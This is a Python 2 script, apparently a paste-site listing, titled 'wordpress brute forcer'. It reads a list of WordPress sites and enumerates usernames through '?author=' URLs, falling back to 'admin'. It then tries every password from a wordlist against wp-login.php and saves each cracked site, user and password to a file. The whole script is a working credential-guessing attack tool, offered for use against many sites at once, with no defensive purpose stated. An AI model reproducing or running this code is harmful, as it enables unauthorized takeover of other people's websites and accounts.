wordpress brute forcer

1. #!/usr/bin/python
2.  
3. #  >>>>>>>>> bismallah <<<<<<<<<<
4. # Coded by MatriX Coder | [email protected]
5. # You are free to edit my code and to remove my rights :D
6. # Greetz to fallega team | www.dev-tun.tn
7.  
8. '''
9. this a wordpress bruter
10. the special thing about it that it
11. grabs user and brute force it
12. '''
13.  
14. # v1.0 first release
15.  
16. import sys , re , urllib2 , urllib , cookielib , os
17. from platform import system
18.  
19. if system() == 'Linux':
20.     os.system('clear')
21. if system() == 'Windows':
22.     os.system('cls')
23.  
24. logo = '''
25.  
26. _       ______  __               __      
27. | |     / / __ \/ /_  _______  __/ /____    | ----| Wordpress Bruter |----
28. | | /| / / /_/ / __ \/ ___/ / / / __/ _ \  | Author : MatriX Coder
29. | |/ |/ / ____/ /_/ / /  / /_/ / /_/  __/   | FB : www.fb.com/matrixcoder2
30. |__/|__/_/   /_.___/_/   \__,_/\__/\___/    | Blog : www.matrixcoder.co.vu
31.                                      
32.  
33. '''
34.  
35. print(logo)
36.  
37. # this function is to enumerate user
38. def user(site , passlist):
39.     userlist = list()
40.     i = 1
41.     # you can edit to whatever number of users you want to enumerate
42.     while( i <= 5 ) :
43.         url = site + '?author=%i' % i
44.         try:
45.             data = urllib2.urlopen(url).read()
46.             # cleaning the sh*t
47.             re1 = re.findall("<title>(.*?)</title>" , data)
48.             user = re.search("(.*?) |" , re1[0]).group(1)
49.             userlist.append(user)
50.         except:
51.             pass
52.         i += 1
53.     wpbrute(site , userlist, passlist)
54.     return site
55.    
56.  
57. def wpbrute(site , userlist , passlist):
58.     for user in userlist:
59.         # if enumeration returns no user
60.         if user == "" :
61.             userlist[0] = "admin"
62.             del userlist[1:]
63.    
64.     for user in userlist :
65.         for password in passlist:
66.             try:
67.                 print str(site) + ':' +  user + ':' + password
68.                 # found the answer on stackoverflow
69.                 cj = cookielib.CookieJar()
70.                 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
71.                 login_data = urllib.urlencode({'log' : user, 'pwd' : password})
72.                 opener.open(str(site) + 'wp-login.php', login_data)
73.                 resp = opener.open(str(site)+'wp-admin')
74.                 final = resp.read()
75.                 if '<li id="wp-admin-bar-logout">' in final:
76.                     print "\n\t[*] Cracked : " + str(site) + ':' +  user + ':' + password + '\n'
77.                     with open('wpcracked.txt' , 'a') as myfile:
78.                         myfile.write('~~ Cracked ~~ ' + str(site) + ':' +  user + ':' + password + '\n')
79.                     break
80.                    
81.             except:
82.                 pass
83.  
84. try:
85.     siteslist = list()
86.     passlist = list()
87.     wpfile = sys.argv[1]
88.     wordlist = sys.argv[2]
89.     # opening sites file
90.     sites = open(wpfile).readlines()
91.     # opening password files   
92.     passes = open(wordlist).readlines()
93.     # passes to list
94.     for pass1 in passes:
95.         pass1 = pass1.rstrip()
96.         passlist.append(pass1)
97.     # sites to list
98.     for site in sites:
99.         site = site.rstrip()
100.         if 'http://' not in site:
101.             site = 'http://' + site
102.         if '/' != site[-1]:
103.             site = site + '/'
104.        
105.         user(site , passlist)
106.  
107.        
108. except IndexError:
109.     print "[*] Usage : python "+sys.argv[0]+" wp.txt wordlist.txt"